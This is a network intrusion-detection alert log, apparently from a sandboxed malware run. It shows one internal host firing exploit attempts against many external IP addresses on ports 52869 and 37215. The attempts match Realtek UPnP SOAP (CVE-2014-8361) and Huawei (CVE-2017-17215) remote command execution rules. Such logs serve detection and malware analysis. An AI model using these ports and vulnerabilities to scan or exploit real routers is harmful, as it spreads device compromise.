                                                07/20/24-23:05:38.404197TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613678652869192.168.2.14213.189.106.94
                                                07/20/24-23:05:52.459685TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5248452869192.168.2.14183.224.136.118
                                                07/20/24-23:05:58.955037TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23343452869192.168.2.14126.2.43.140
                                                07/20/24-23:06:16.535822TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614990252869192.168.2.1442.171.12.149
                                                07/20/24-23:05:33.860838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4467037215192.168.2.14128.4.57.232
                                                07/20/24-23:05:40.461168TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25409852869192.168.2.1487.103.117.210
                                                07/20/24-23:05:57.787088TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614107852869192.168.2.1460.229.99.124
                                                07/20/24-23:06:23.359635TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613808652869192.168.2.1471.91.216.235
                                                07/20/24-23:05:37.497165TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24259052869192.168.2.1414.148.186.244
                                                07/20/24-23:05:56.881095TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615656452869192.168.2.14160.180.47.240
                                                07/20/24-23:06:03.216294TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5225852869192.168.2.14175.129.157.75
                                                07/20/24-23:06:05.879269TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615088452869192.168.2.14179.233.222.192
                                                07/20/24-23:07:07.975226TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613596652869192.168.2.1477.225.77.218
                                                07/20/24-23:05:45.359662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3935037215192.168.2.1441.38.139.189
                                                07/20/24-23:05:58.794030TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4866852869192.168.2.14110.201.72.125
                                                07/20/24-23:05:58.803048TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614511452869192.168.2.14200.186.146.236
                                                07/20/24-23:06:16.438363TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4525237215192.168.2.14157.103.210.22
                                                07/20/24-23:05:44.929116TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614658052869192.168.2.1431.172.196.201
                                                07/20/24-23:06:00.592911TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5238452869192.168.2.14128.122.142.178
                                                07/20/24-23:06:13.638173TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613990452869192.168.2.1470.179.16.59
                                                07/20/24-23:05:37.441224TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25624252869192.168.2.14162.190.144.241
                                                07/20/24-23:05:44.327654TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615938452869192.168.2.14142.243.145.171
                                                07/20/24-23:05:57.576576TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5620452869192.168.2.1453.153.197.182
                                                07/20/24-23:06:03.159645TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613380252869192.168.2.14119.180.143.176
                                                07/20/24-23:06:14.686896TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4098052869192.168.2.14192.15.83.19
                                                07/20/24-23:06:19.955933TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23374652869192.168.2.1449.66.14.28
                                                07/20/24-23:05:52.635775TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3411652869192.168.2.14220.118.15.248
                                                07/20/24-23:06:03.367262TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4346037215192.168.2.14157.0.230.10
                                                07/20/24-23:06:01.746633TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615416252869192.168.2.1475.115.110.52
                                                07/20/24-23:06:06.246694TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4568452869192.168.2.14128.209.120.37
                                                07/20/24-23:05:39.062924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4532637215192.168.2.1441.167.241.255
                                                07/20/24-23:05:35.434236TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3474052869192.168.2.14116.132.89.76
                                                07/20/24-23:06:03.435630TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24309652869192.168.2.14169.254.99.226
                                                07/20/24-23:05:47.815872TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6019452869192.168.2.14182.31.232.148
                                                07/20/24-23:07:34.258673TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24932252869192.168.2.14123.51.179.219
                                                07/20/24-23:06:02.767606TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4017852869192.168.2.14135.7.73.21
                                                07/20/24-23:05:48.197560TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616018452869192.168.2.1491.53.215.210
                                                07/20/24-23:05:36.577316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5713237215192.168.2.14162.94.214.105
                                                07/20/24-23:05:42.135703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4045237215192.168.2.14197.59.69.246
                                                07/20/24-23:05:48.783693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5843637215192.168.2.1491.102.234.79
                                                07/20/24-23:05:38.492873TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615061252869192.168.2.14164.11.137.216
                                                07/20/24-23:05:58.720996TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4206652869192.168.2.14210.222.196.155
                                                07/20/24-23:06:01.842190TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3816252869192.168.2.1460.51.96.114
                                                07/20/24-23:05:40.421092TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3737452869192.168.2.14161.126.18.243
                                                07/20/24-23:05:52.575727TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26030052869192.168.2.14172.124.74.59
                                                07/20/24-23:05:35.426258TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5469852869192.168.2.14138.71.112.70
                                                07/20/24-23:06:00.055828TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615138252869192.168.2.1432.213.57.170
                                                07/20/24-23:05:57.898445TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5104452869192.168.2.1420.69.99.207
                                                07/20/24-23:05:38.905402TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614613852869192.168.2.14190.0.225.28
                                                07/20/24-23:06:09.106479TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25377652869192.168.2.14140.134.248.178
                                                07/20/24-23:05:42.143657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4536837215192.168.2.1441.101.123.230
                                                07/20/24-23:05:42.257476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3791237215192.168.2.14197.217.100.196
                                                07/20/24-23:05:59.119988TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3647052869192.168.2.141.71.203.54
                                                07/20/24-23:05:48.801547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4982237215192.168.2.14157.94.209.230
                                                07/20/24-23:05:39.062924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4351037215192.168.2.1441.237.213.46
                                                07/20/24-23:05:34.644841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6045437215192.168.2.141.160.229.40
                                                07/20/24-23:05:56.994605TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613411452869192.168.2.1487.182.203.169
                                                07/20/24-23:05:42.257816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5677637215192.168.2.14157.187.149.53
                                                07/20/24-23:06:01.154110TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25926252869192.168.2.14162.255.243.82
                                                07/20/24-23:06:01.224583TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24193052869192.168.2.1437.219.135.4
                                                07/20/24-23:05:36.343632TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4831237215192.168.2.1432.2.223.204
                                                07/20/24-23:06:11.880262TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25956452869192.168.2.14132.226.208.26
                                                07/20/24-23:06:13.638173TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5600852869192.168.2.14101.94.153.21
                                                07/20/24-23:06:00.139140TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4335652869192.168.2.1420.84.196.35
                                                07/20/24-23:06:04.058070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5623237215192.168.2.14197.137.84.125
                                                07/20/24-23:05:34.660344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4333237215192.168.2.1441.7.174.17
                                                07/20/24-23:05:40.486123TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5010452869192.168.2.14165.39.41.234
                                                07/20/24-23:05:38.501893TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615497852869192.168.2.14192.79.124.241
                                                07/20/24-23:05:37.447263TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6096452869192.168.2.14223.12.218.46
                                                07/20/24-23:06:22.982491TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4785252869192.168.2.1443.11.143.126
                                                07/20/24-23:05:45.728529TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3350252869192.168.2.14101.8.57.23
                                                07/20/24-23:06:01.982337TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25874052869192.168.2.14126.18.149.137
                                                07/20/24-23:05:45.682267TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614908652869192.168.2.1462.30.160.191
                                                07/20/24-23:05:50.555898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5256037215192.168.2.1457.7.134.79
                                                07/20/24-23:05:42.134564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4905237215192.168.2.14197.201.204.182
                                                07/20/24-23:06:16.939710TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3585052869192.168.2.14104.194.184.102
                                                07/20/24-23:05:59.102064TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5319652869192.168.2.14198.211.160.55
                                                07/20/24-23:06:01.467143TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614669452869192.168.2.14191.99.77.22
                                                07/20/24-23:06:32.610184TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3326252869192.168.2.14203.221.19.166
                                                07/20/24-23:05:58.983376TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25330452869192.168.2.1473.169.3.41
                                                07/20/24-23:06:00.147952TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615069052869192.168.2.1413.115.234.149
                                                07/20/24-23:05:38.449219TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5662452869192.168.2.1468.68.58.116
                                                07/20/24-23:05:47.410737TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614606452869192.168.2.1476.156.13.20
                                                07/20/24-23:06:01.759260TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5673452869192.168.2.14186.11.211.163
                                                07/20/24-23:05:36.343227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5465637215192.168.2.14197.204.66.242
                                                07/20/24-23:05:34.625707TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5427637215192.168.2.1441.13.154.17
                                                07/20/24-23:06:07.530370TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613888452869192.168.2.14115.151.82.228
                                                07/20/24-23:06:16.139088TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24354052869192.168.2.1470.151.190.95
                                                07/20/24-23:05:34.662338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3555037215192.168.2.14157.38.118.86
                                                07/20/24-23:07:23.347168TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5328852869192.168.2.14211.53.160.252
                                                07/20/24-23:06:06.437928TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615954452869192.168.2.14180.41.161.208
                                                07/20/24-23:06:20.610603TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4360452869192.168.2.14120.26.14.0
                                                07/20/24-23:05:47.125782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4277837215192.168.2.14157.250.216.64
                                                07/20/24-23:06:19.602853TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613613452869192.168.2.14217.29.231.50
                                                07/20/24-23:05:35.981370TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614375452869192.168.2.14103.14.70.39
                                                07/20/24-23:05:56.088545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5399237215192.168.2.14197.201.194.135
                                                07/20/24-23:05:40.330643TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5896052869192.168.2.14163.148.202.115
                                                07/20/24-23:05:57.159681TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4674052869192.168.2.14110.237.107.43
                                                07/20/24-23:05:57.518359TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25553052869192.168.2.14175.103.230.10
                                                07/20/24-23:05:37.452253TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5828252869192.168.2.14193.85.31.138
                                                07/20/24-23:05:56.066947TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4112437215192.168.2.1441.204.206.44
                                                07/20/24-23:05:37.469321TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4703652869192.168.2.14211.173.154.125
                                                07/20/24-23:05:40.224363TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6049852869192.168.2.1458.92.201.189
                                                07/20/24-23:07:01.438133TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615936852869192.168.2.1452.229.50.98
                                                07/20/24-23:05:39.771399TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6066237215192.168.2.14197.130.43.165
                                                07/20/24-23:06:01.219202TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4694052869192.168.2.141.64.96.57
                                                07/20/24-23:05:34.653253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3851637215192.168.2.1464.130.174.77
                                                07/20/24-23:05:45.412131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5400237215192.168.2.1441.193.133.144
                                                07/20/24-23:05:57.592012TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614024252869192.168.2.14189.67.163.117
                                                07/20/24-23:06:02.422168TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3726852869192.168.2.1466.165.40.13
                                                07/20/24-23:05:57.137886TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5952652869192.168.2.14183.63.189.195
                                                07/20/24-23:05:39.773172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5274237215192.168.2.14157.103.7.24
                                                07/20/24-23:05:55.427852TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614052652869192.168.2.1478.180.137.61
                                                07/20/24-23:06:15.664505TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24518652869192.168.2.14206.201.63.188
                                                07/20/24-23:05:39.054227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5157437215192.168.2.14157.35.9.79
                                                07/20/24-23:06:15.664506TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3968452869192.168.2.1440.175.52.158
                                                07/20/24-23:05:39.765891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4284837215192.168.2.14155.134.155.192
                                                07/20/24-23:05:47.313425TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615832052869192.168.2.14162.169.7.175
                                                07/20/24-23:06:27.780457TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5177652869192.168.2.14179.254.24.143
                                                07/20/24-23:06:34.148720TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613519052869192.168.2.1466.165.40.13
                                                07/20/24-23:05:37.454427TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26017252869192.168.2.14137.134.252.4
                                                07/20/24-23:05:52.499861TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25404652869192.168.2.14223.70.59.173
                                                07/20/24-23:05:33.829338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3280437215192.168.2.1494.44.111.34
                                                07/20/24-23:05:39.825155TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4669852869192.168.2.1454.177.195.84
                                                07/20/24-23:05:37.443569TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5179452869192.168.2.1414.214.68.156
                                                07/20/24-23:05:45.412130TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5032837215192.168.2.1441.61.69.117
                                                07/20/24-23:05:47.787869TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614700452869192.168.2.1473.41.138.160
                                                07/20/24-23:06:38.067768TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4497052869192.168.2.14126.180.229.141
                                                07/20/24-23:05:59.827265TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4885252869192.168.2.14103.96.99.69
                                                07/20/24-23:06:35.288760TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613415852869192.168.2.14176.160.7.108
                                                07/20/24-23:05:44.273031TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4864252869192.168.2.144.202.29.142
                                                07/20/24-23:05:47.103906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4856437215192.168.2.14157.71.94.79
                                                07/20/24-23:06:00.164569TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5155452869192.168.2.14196.194.6.236
                                                07/20/24-23:06:15.084045TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614312052869192.168.2.14128.202.250.195
                                                07/20/24-23:05:52.528818TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25654252869192.168.2.1499.194.98.130
                                                07/20/24-23:06:03.269499TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23312052869192.168.2.1452.229.50.98
                                                07/20/24-23:05:37.457748TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25532852869192.168.2.14115.97.137.57
                                                07/20/24-23:06:03.037561TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5327452869192.168.2.14153.97.3.129
                                                07/20/24-23:06:02.018794TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4612052869192.168.2.1480.193.144.183
                                                07/20/24-23:06:06.216907TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24108052869192.168.2.14182.38.32.134
                                                07/20/24-23:06:00.607400TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3300052869192.168.2.14102.108.27.28
                                                07/20/24-23:05:39.777436TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5438037215192.168.2.14106.95.59.38
                                                07/20/24-23:06:15.480465TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615757852869192.168.2.1476.60.118.192
                                                07/20/24-23:05:59.119232TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25131452869192.168.2.14186.26.42.76
                                                07/20/24-23:06:00.698150TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5291652869192.168.2.14222.16.169.125
                                                07/20/24-23:06:02.853581TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5225652869192.168.2.14119.157.54.136
                                                07/20/24-23:05:37.496382TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3459452869192.168.2.141.211.28.20
                                                07/20/24-23:05:40.444876TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24655852869192.168.2.14121.140.37.67
                                                07/20/24-23:05:59.338625TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3943252869192.168.2.14216.168.149.77
                                                07/20/24-23:06:04.098403TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615616852869192.168.2.1438.52.11.189
                                                07/20/24-23:06:19.714340TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6019452869192.168.2.14154.75.87.243
                                                07/20/24-23:06:21.974244TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5014652869192.168.2.1419.70.239.97
                                                07/20/24-23:06:13.586481TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3387252869192.168.2.1497.55.184.51
                                                07/20/24-23:05:34.625708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4115437215192.168.2.14197.219.167.144
                                                07/20/24-23:06:14.441698TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615028452869192.168.2.14159.87.117.156
                                                07/20/24-23:05:36.343632TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4666837215192.168.2.14157.134.217.137
                                                07/20/24-23:05:59.361832TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613972652869192.168.2.14164.140.163.126
                                                07/20/24-23:05:50.600216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3365437215192.168.2.1447.251.150.80
                                                07/20/24-23:06:13.097390TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4172852869192.168.2.14150.173.238.1
                                                07/20/24-23:06:25.893173TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5846652869192.168.2.1457.212.53.76
                                                07/20/24-23:05:45.468009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4851837215192.168.2.1441.26.49.130
                                                07/20/24-23:06:14.614129TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5512452869192.168.2.14129.99.98.243
                                                07/20/24-23:05:40.440618TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4677852869192.168.2.14157.151.72.129
                                                07/20/24-23:05:47.502937TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5630452869192.168.2.14189.210.242.78
                                                07/20/24-23:06:01.180750TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614800452869192.168.2.14133.227.108.255
                                                07/20/24-23:05:37.549791TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25072252869192.168.2.1458.236.61.29
                                                07/20/24-23:05:38.137665TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4506052869192.168.2.14161.222.69.144
                                                07/20/24-23:05:57.816478TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3420252869192.168.2.145.133.222.207
                                                07/20/24-23:05:58.549030TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24954452869192.168.2.14165.161.227.86
                                                07/20/24-23:05:35.582471TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615372652869192.168.2.1427.129.79.40
                                                07/20/24-23:05:52.554753TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25272652869192.168.2.1486.160.0.18
                                                07/20/24-23:05:38.465756TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613373052869192.168.2.14193.5.42.88
                                                07/20/24-23:06:27.692046TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615378052869192.168.2.14212.222.225.7
                                                07/20/24-23:05:40.344189TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4167452869192.168.2.1431.43.154.194
                                                07/20/24-23:05:46.397411TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615040452869192.168.2.14105.68.61.194
                                                07/20/24-23:05:56.454514TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615701652869192.168.2.14198.222.64.107
                                                07/20/24-23:05:56.038244TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3956437215192.168.2.14157.34.251.250
